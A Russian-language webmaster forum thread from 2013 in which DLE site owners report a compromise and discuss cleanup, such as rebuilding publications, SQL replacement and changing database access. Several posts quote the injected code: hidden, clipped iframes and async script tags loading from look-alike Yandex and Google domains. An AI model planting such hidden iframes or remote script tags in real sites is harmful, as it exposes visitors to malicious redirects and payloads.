Попробуйте создать бекап базы и запустить Перестроение публикаций - Безопасность

Взлом DLE всплывает окно на сторонний ресурс.

esys · 2013-09-12T16:32:37.0000000Z

Прошу помощи у тех кто разбирается. Установлена DLE, со вчерашнего дня на сайте с того не с сего стало появляться всплывающая страница на другой ресурс. Касперский выдает сообщение - Запрещено: http://webmaster-google.ru/crossdomain.xml Вижу уже на трех сайтах вот один из них, давно лежит все руки не доходят, но отсутствие трафика не спасло его от злоумышленника:) В конце документа вижу кучу ифреймов левых однако пока не понял как они туда попали в файле шаблона их нет. Поиск тоже не ищет( И тп. <iframe src="http://statsyandex.ru/BvmMRCV.cgi?3" style="position: absolute !important; overflow: hidden; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px); width: 255px; height: 655px;"></iframe> <div id="start20130912"></div> <iframe src="http://yandex-webmaster.ru/JQYFE.cgi?3" style="position: absolute !important; overflow: hidden; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px); width: 421px; height: 273px;"></iframe> Кто знает где собака зарыта подскажите, буду благодарен. Тем не нашел похожих, что больше ни у кого нету?

136

nevinskiibomzh

14 сентября 2013, 07:33

#21

бесполезная функция, удалил ее нафиг, никто ее не юзает все равно...

118

SEOCondition

14 сентября 2013, 11:00

#22

Не всегда виноват программист - стоит учитывать и серверное ПО, которое не всегда обновлено до актуальных и стмбильных версий.

Кроме того, на ресурсах, посвящённых CMS DLE and etc... множество условно "чистых" релизов со вшитыми подарками.

--

В общем, если кому будет нужна консультация, решение возникших проблем - пишите в ЛС.

P.S: чем больше всяческих свистелок в движке - тем больше уязвимостей... Старая истина.

[⚡] PBN под ключ, обслуживание, консультации — обращайтесь в личку

Услуги по DLE (DataLife CMS Для работы с Тема благодарносте r-dorgen

211

3BEPEK

15 сентября 2013, 23:03

#23

Вот что дописали в полную новость:

Либо в конце новости: <script async="async" type="text/javascript" src="http://google-webmaster.ru/e4da3b7fbbce2345d7772b0674a318d5.js"></script>

Ребят как устранить лучше? Бэкап есть, но 3-4 дневной давности, новых постов и материалов много, не хочется поднимать бэкап, как вылечить пока не разобрался ни кто еще?

---------- Добавлено 16.09.2013 в 03:29 ----------

nevinskiibomzh:
бесполезная функция, удалил ее нафиг, никто ее не юзает все равно...

Как удалили, подскажите плз

Перестроение публикаций помогло. Завтра буду все восстанавливать не посещаемое и латать (

---------- Добавлено 16.09.2013 в 03:45 ----------

esys:
Перестроение публикаций как уверяет разработчик убьет весь этот треш. Попробуйте, а еще на хабре я где-то скрипт видел погуглите

Что за скрипт, не поможет для большого количества сайтов? Что то поискал, пока без результатов.

➡️ ➡️ Лучший хостинг на земле! Ответ саппорта в течении 1-2 минут. Попробуйте и скажите мне - Спасибо ( https://vk.cc/9jsY3X ).

Если видишь Бургер Кинг 10 лучших практических решений Pew Research: В США

D

42

Dragovith

16 сентября 2013, 05:09

#24

Думал меня одного зацепило, таже проблема уже пару раз я удалял этот код: <script async="async" type="text/javascript" src="http://google-webmaster.ru/f899139df5e1059396431415e770c6dd.js"></script>

Латал дырки, но он всеравно вылазит. Кто нашел решение проблемы? Где шел?) Каму ноги ломать..)

Если видишь Бургер Кинг 10 лучших практических решений В Google разработали HTML-атрибут

108

romasenco

16 сентября 2013, 06:21

#25

Dragovith:
Латал дырки, но он всеравно вылазит. Кто нашел решение проблемы? Где шел?) Каму ноги ломать..)

а причем здесь ноги? этим животным руки отрывать надо. Они ведь это г..о руками делают.

211

3BEPEK

16 сентября 2013, 09:14

#26

Начал все ручками восстанавливать с помощью Перестроение публикаций. Блин а пачка внушительная (

---------- Добавлено 16.09.2013 в 13:14 ----------

romasenco:
а причем здесь ноги? этим животным руки отрывать надо. Они ведь это г..о руками делают.

И голову тоже

Ребят а как в дальнейшем от этого защититься?

B

1

b1lder

16 сентября 2013, 13:04

#27

Ребят, аналогичная проблема...

Сделал так - создал бекап базы, скачал базу, открыл через блокнот и заменил все скрипты просто на пустой символ.

Ссылки были вида src="http://google-webmaster.ru/70efdf2ec9b086079795c442636b55fb.js"

211

3BEPEK

16 сентября 2013, 14:01

#28

b1lder:
Ребят, аналогичная проблема...
Сделал так - создал бекап базы, скачал базу, открыл через блокнот и заменил все скрипты просто на пустой символ.
Ссылки были вида src="http://google-webmaster.ru/70efdf2ec9b086079795c442636b55fb.js"

Проще в админке запустить Перестроение публикаций

71

Tsilya

17 сентября 2013, 14:04

#29

По-мойму проще это сделать обычным SQL-запросом, заменить этот скрипт на пустое место.

Я у себя так и сделал.

R

180

Алексей

19 сентября 2013, 07:08

#30

3BEPEK:
Проще в админке запустить Перестроение публикаций

Tsilya:
По-мойму проще это сделать обычным SQL-запросом, заменить этот скрипт на пустое место.
Я у себя так и сделал.

Да любой вариант подходит, главное после всех процедур сменили доступ к БД, а то часто это забывают сделать.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах

Все что нужно знать о DDоS-атаках грамотному менеджеру

Взлом DLE всплывает окно на сторонний ресурс.